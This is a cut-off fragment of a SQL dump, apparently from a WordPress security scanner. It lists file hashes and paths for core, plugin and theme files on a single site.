'',''),(1629897503,1,0,0,0,0,'91e5f3d760318a1e7a708c0c1ed2c283870c4280','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/global-status.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'91f4d5a79bc71e485f5b73208d7b9e6d5632b845','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfSupportController.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9221436bbdafa7757b329cd69313af5e717beec2','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/418.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'927e95c82b9390411746cc573ef0d3abd76f1f86','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/document-types/page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'92984ae9b98fea9c5671c1ff6e291247237ecabd','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/305.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'929dd234c89e92fe767ed401c7ba384437fedef0','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/autoloader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'93984b7b5d21adcf28426dbb0edfb69486ce5693','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'93ab129c662ab1095a531b7f84f659bf07deb7d3','/home/westonspirit.org.uk/public_html/wp-admin/network/credits.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'93b3e1d8cdc40738b64673044ce27ea577dff02c','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-meta.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'93bdf001e2fc8331bff1996054a9fe52e2e469e9','/home/westonspirit.org.uk/public_html/wp-includes/nav-menu-template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'93c27b7ac8e52d2ccb79ddb6165e4e92d79bb48f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/models/page/wfPage.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'93cfdf32053e0e4e288a1334fa53f404d5c82b48','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/frontend/render-modes/render-mode-normal.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'942535e507ca1fbc3aac462053fbfbf465e98f8b','/home/westonspirit.org.uk/public_html/wp-admin/includes/deprecated.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'94293d4a1982bc75d4eb90ec8d05669a8693c2af','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9433c0445e6e6971f7cd56111d3932c5f3d80100','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/settings/settings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'94429f42c5ef97c3083234eb1beb7258800e9556','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9480fe5bf2abc8b144b16952ff4a5f617c161833','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/choose.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'94849dd167c8d727b8cda3cd3a505f2741934a82','/home/westonspirit.org.uk/public_html/wp-admin/ms-edit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'949fcb171adfaa1457755c277a704a5321511152','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/417.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'94b10bc1f8abd0aaf6206d30bda146eb08363fff','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns/heading-paragraph.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'94d8d507e886eb50d328d86879c20efa7856d545','/home/westonspirit.org.uk/public_html/wp-includes/template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'94f8abc97ed9a681dc97e5bdb3ce55a39338ef94','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/library/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9528bb688d897717301f3c4dc8172d7a826d3cee','/home/westonspirit.org.uk/public_html/wp-admin/about.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9536fbbb143a89b7784ee51b5efa45f7bd36b3ec','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/IPTrafList.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'95621a998b1e5d06692116bc408805d012178c07','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9570ea5f5a89eac63e30e04355cb1ee15b41c3e0','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Cookie.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'957c1f0efcf63b6244c115348e33dd2ef503ee90','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'95a026cd8b09194611b581610c2a426bfd2aa4b5','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'95a2518529ae46944d400f88b8b273a9aeb3e2fc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/scan-progress.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'95a925cb01f42a83eeadeb07cc25d2d473006c01','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'95bf93e119c1472fe4bc14e3f2d7135064a2f6f5','/home/westonspirit.org.uk/public_html/wp-admin/options-reading.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'95c0cc8c6d95f1bf3eda4069f5577767bee782b5','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'95c3eddf9704586cc410c8e7c11d84a222eee90d','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'95c4ffae665076b95482287bed9155c706bf7cb3','/home/westonspirit.org.uk/public_html/wp-trackback.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'95cb364dc644a3e5ab43c18cd1021396584242ca','/home/westonspirit.org.uk/public_html/wp-includes/theme-compat/footer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'95e0632cbacea956a2a8e590736879c487db978d','/home/westonspirit.org.uk/public_html/wp-includes/class-walker-category-dropdown.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'968f144444ed1b2b92715c18766faa3dfa4e8bc5','/home/westonspirit.org.uk/public_html/wp-admin/includes/noop.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'96b4df95b540ac297c5336ea6088e9ac55a70a3c','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'96cb569c9726870cc5b84a0df86da45cd3312a9c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/admin-templates/new-template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'96e279d912cf63bf28017ac693c15abd994eed9f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/utils/import-export/wp-import.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'96fb1ff6b4a3715bfb12235e0b2275aa9d8f1683','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'96fc11050619cad92ffc7ac98a32b05193f88517','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/408.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9702c02cc91f471b68613239e385083cd76895bf','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'971f5caae3f9217dd739cdf4016bb4037f5b6817','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/XChaCha20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9732207164f5a3c6c0832ef5a41ae4f83a17777a','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-role.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'975f78eb99a8e7e2b844f52cdc23af3654854009','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-post.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'97937a71bcc3ed09a921236e5bf645b74b5da2d0','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/modules/nginx.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'97a33ec322ff0b6ed9edebf62537d16264605140','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfModuleController.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'97db3c4a1f34b0f7b1ebeb50d0cbd165abe7ffc7','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/archive.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'985f83c0659c5e468d6b9980a7dfaeac012b2a46','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'988368f3db975d4a848e4f94c6453582adc42eca','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/vendors/wp-bootstrap-navwalker/wp-bootstrap-navwalker.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'989fd2df5a8f88875cc4faedeb8fcc8284907934','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/editor/notice-bar.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'98a691f3be9505c6bcdd24c509af3d162703065f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'98a89e32b5170933fc19247e86dafe3f5e8ba6fb','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/template-parts/content/content-none.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'98b5bb7e59c83e94041f2a8453577cda1a4e7b51','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-license.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'98d3aaa54f8df792b1e6923ec3cc795a413515b1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9922383341b6cb97684b59c32397db925f5fef74','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/models/scanner/wfScanner.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'993bb5596ca21ce47569ec2fcc85e69d6779e554','/home/westonspirit.org.uk/public_html/wp-admin/edit-tag-form.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'999195f68f8640a660fc2e1850ef7e5b4bed4b12','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'99c7f1c9746026ef906a6be52694013fc7371def','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/compatibility/envato.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'99d7ffb1891e725ff5f7573025c0a7c8e50967c9','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/finder/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'99d83eb5ea7a62c6ccbc151e1184016f29f29403','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-nav-menu-setting.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'99fd75121fda011cfdbee55fd89c50cdfafddf19','/home/westonspirit.org.uk/public_html/wp-admin/media-new.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9a01daa423caf4fb0a36ebdff2dc400c799a13ff','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9a21598f046c157977b51d889968b446775e9714','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/api/api-plugin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9a2bf66beff111907879c73f26e0d6625b7f25b7','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/comments.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9a316a3a15fa6a9b7fe4ece0b0106bf258e7309e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/reporters/wordpress.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9a3c00a1c4aa89e72e6188bbc73f037c4210f9da','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Ed25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9a3cf0236c1eb52290854c0cd24ab8d7caca32dd','/home/westonspirit.org.uk/public_html/wp-includes/IXR/class-IXR-message.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9a5fd660913164230faa99e8fb83494d8eb12f71','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-calendar.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9a7496b50b706ad534e2363f60e77d3038480ea9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/page-help.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9a83db9f4c66852c0c0ddadc3c4ae7fe5e88a253','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-session-tokens.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9aabc90b77e48ddfeb4b1ed6dc5cb47eb95e879e','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/inc/menu-functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9ac03dbe320c6300b48ce8dd74943784577f438e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_dashboard_options.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9ad0899f4cffe1ff54f34ae23b9fc89829f52d42','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9add6a0b56ea2288b2d0f9e6d7bbefccddfe7fe3','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9b59deb31495cc553076a6b7985e131825c50871','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9bad9a78942b5599f21c6ed5bed05b55b5867b5c','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Parse/Date.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9bdc51dd49fe586ccc8b78580c00845f3a3e51c4','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/box-shadow.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9c002e462e570c0da6965774186403f729b04d18','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/tgm/class-tgm-plugin-activation.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9c00f14318ecb56749175f780f55e71b0d90ff05','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfActivityReport.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9c0a29be19f5ee41b79ed45378abbebc4453d7ef','/home/westonspirit.org.uk/public_html/wp-logins.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9c115161dbe098b3d94d40d97c1f01e7ee618f25','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/block-navigation-option.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9c24b79515f79ba938e0c08b36175ca3c1792506','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/menu_scanner.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9c4c8d1eb17ed1646f2f987852a6c5c947b92489','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/template-parts/post/author-bio.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9c7314e6591e94219553a28643232dd9a5a6d058','/home/westonspirit.org.uk/public_html/wp-includes/plugin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9cd09c79b642e632c69c0a0e4ebfb6ecc96e57ff','/home/westonspirit.org.uk/public_html/wp-includes/blocks/calendar.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9cd5b8c941e51925decda2e1563adf6bdf123eab','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfCentralAPI.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9cdbe5f90204a0e3fa33aac12be4ad73b94c39bb','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Exception.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9cf0d2f78948bf2c46790a8cd15be257315d64bc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfSchema.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9d2f4927812e1a0c61ee05c03a560040eb092c58','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9d3db15ec22ed54c587640de2557d94d6c129338','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/alert.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9d45e21e41447aefb274fe4cddb66acc313f9ad4','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-custom-html.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9d49ccfe7732caf0e6dbe4b53e6e8b26f0efc2f2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9d4bd87240984bdb7bbed58a32518481255faec0','/home/westonspirit.org.uk/public_html/wp-comments-post.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9d4c294e04d158e2eba69444792e3ae563170e2a','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/template-parts/header/site-branding.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9d9a621bec0b83f0a536df2184832ed53f01a465','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-filesystem-ssh2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9dd29ce57363e8f8b409b5b1517ed08d7164d042','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-file.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9de5390e6115c8542076b3fa90448a1b29a6e750','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/scan-results.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9e334b57f9fd2b5e3ee8f37e8de6221798dfe4f4','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/template-parts/navigation.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9e581c1857aa354314ad205845cea970d11ff365','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9e9e2d86c3fe70091285bcf322172e67cd793230','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/tabs/settings-layout.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9eddad369190b10899522e524dd300c9fa321d85','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/dynamic-tags/base-tag.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9ee67d36d920de3557ce613ddd06760b2a52a825','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9f245c967aa3c66e497794dd4e5d61fc7d53b132','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9f6d1c400e07590936a2a5c32d669f08f43dac91','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9f9e5a76722b53afd58d3fbf72a06f9022ee51e9','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/documents-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9fa0326caced0fdd86caa0a2ff2d7cc9b57c16c7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/tabs/settings-site-identity.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9fac8d4dfed8bc0dd40d9b05d3a345ff10e50688','/home/westonspirit.org.uk/public_html/wp-includes/feed-rss2-comments.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9feaebbbf904ea794aa809e6ee0f29e641e741e9','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/410.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9ff3da8a9e76db1787323cb2f092214b0c6a6deb','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/modules/wordpress.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'9ffcd5434b891f942f75dc311588b8b3e3216745','/home/westonspirit.org.uk/public_html/wp-includes/pomo/plural-forms.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a0809e719feb7ee87b8aa301b3d8604bde18a799','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/XSalsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a087375f92b85656de3dc23aab780d1687ac037d','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-plugin-install-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a0a9f77b75d750303f146b583d1f5e6685652530','/home/westonspirit.org.uk/public_html/wp-admin/ms-sites.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a0aec46135d56b92db135a5ef4364f523ffaad48','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a0e015b539f2b831f755b653e14a911569845f03','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Sanitize.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a10435b832b6488ed147e70c499b0bb3473903cd','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/maintenance-mode.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a14e74f48959ef3a4fd256939d70bdb4ff431aae','/home/westonspirit.org.uk/public_html/wp-admin/custom-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a160ac890358a58fd685b2789e9c37bacdfd4083','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a1998ce22cc11bcd7885d5d5f15d00a0e0576b29','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/redirection-admin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a1a683066ad3bf3bf37396666fcd232e570897b0','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.tag.apetag.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a1b6b50cc8214ee2f54fc335c1bdc2b8d8133435','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/connect/apps/base-user-app.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a1c067c56e677779c0615be6197543764354464d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/shortcode.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a1e2448ac9ccf20ac860046d7c57dc4d0885b553','/home/westonspirit.org.uk/public_html/wp-admin/upgrade.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a1ebe4cc947ec4b76bcd6ea5a159c140e5ecae50','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-network.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a1f9b5f5e658eecae198182ec35f6fb1617a9111','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a238930963fad343edb60ce0f77653d366471da6','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/logger/items/file.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a2401bdcb87fe320a5886e771d557de1921b18e9','/home/westonspirit.org.uk/public_html/wp-includes/feed-rdf.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a271fba7366a2521264e0abbe336fae21ddffce4','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wordfenceClass.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a276fe6407f83b42e9e0ed3519a283a473a07ca7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/finder/categories/settings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a28bb361701ec21a7032a516dbaae97037a3a47c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a2f8a35f0b53c79bccadc505d555d7b928452045','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a305d7ad113fa225e9a214518d9b0a0a53eea56b','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a315cdaf938051fc6f1cb881b9ac6e7df952df8b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a3244c29b678d75a1a466f43b9a04c04e15a3eb0','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/scan-type.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a338b167968ba21914abec9786b36fe65d503c17','/home/westonspirit.org.uk/public_html/wp-includes/nav-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a3511b9f07c8f206b5b169232b7b445ad31158cb','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/501.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'a38e1c91b780113fcd5a31706c0a55734925bb2e','/home/westonspirit.org.uk/public_